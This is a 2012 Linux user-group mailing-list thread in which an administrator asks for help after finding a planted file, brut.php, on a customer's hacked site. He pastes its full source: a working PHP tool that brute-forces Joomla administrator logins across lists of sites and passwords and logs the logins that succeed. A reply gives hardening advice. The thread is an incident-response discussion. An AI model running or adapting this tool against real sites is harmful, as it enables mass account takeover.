date:20120821

[SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread David Lyon

I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):

How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?

--- brut.php (don't run this) ---

body bgcolor=#808080

p align=centerbfont size=5 color=#FF#nbsp; GaStRo
-Dznbsp;nbsp; #/font/b/p
p align=centerbfont color=#FFJoomla Speed Brute
Force/font/b/p
form method=post action= enctype=multipart/form-data
p align=centerbfont color=#FFUsername/font/bfont
color=#FF:
input type=text name=usr value='admin' size=28  bEx: Admin ;
administrator/b/font/p
p align=centerfont color=#FFin , administrator ,  ..br
/fontbfont color=#FFsites list:/font/bfont
color=#FF
input type=file name=sites size=34/font/p
p align=centerfont color=#FFbr
/fontbfont color=#FFPass list/font/bfont color=#FF
input type=file name=w0rds size=35/font/p
p align=centerfont color=#FFbr
input type=submit name=x value=Start!
/font/p
/form
p align=centerfont color=#FFba href=http://Www.sec4ever.com

font color=#FFWww.sec4ever.com/font/a span
lang=ar-dz|/span
a href=http://Www.gastro-dz.net;font color=#FFWww.gastro-dz.net
/font/a
/b/font/p
p align=centerbfont color=#FFGreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi -  Al l
Dz Hackerz Team/font/b/p
p align=centernbsp;/p

?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro

if($_POST['x']){

echo hr;

$sites = explode(\n,file_get_contents($_FILES[sites][tmp_name])); //
Get Sites !

$w0rds = explode(\n,file_get_contents($_FILES[w0rds][tmp_name])); //
Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack-check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class  Function'z

function txt_cln($value){  return str_replace(array(\n,\r),,$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this-post($site,$user,$pass))){

echo b# login successful : $user:$pass - $site/bBR;
$f = fopen(j0s_result.txt,a+); fwrite($f , $user:$pass - $site\n);
fclose($f);
flush();
}else{ echo # Failed : $user:$pass - $siteBR; flush();}

}

public function post($site,$user,$pass){ // Post - user  pass

$token = $this-extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'passwd='.$pass.'lang=en-GBoption=com_logintask=login'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for -
function post

$source = $this-get_source($site);

preg_match_all(/type=\hidden\ name=\([0-9a-f]{32})\ value=\1\/si
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for - function
extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

Re: [SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread Mark Walkom

On 22 August 2012 12:00, David Lyon david.lyon.preissh...@gmail.com wrote:

 I have a customer with a hacked website.

 When I ftp'd to their web-server I found this wart (listed below - saved as
 brut.php):

 How did the hacker put it on my system ? What could it have comprimised ?
 What
 can I do to stop further consequences?


Reset any management/admin passwords to be safe. Make sure everything
running on the server is up to date - OS, DB, Apache etc.

Get rid of FTP, use SCP and fail2ban.
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

[SLUG] Customer site hacked with brut.php - what to do?

Re: [SLUG] Customer site hacked with brut.php - what to do?

2 matches

Site Navigation

Mail list logo

Footer information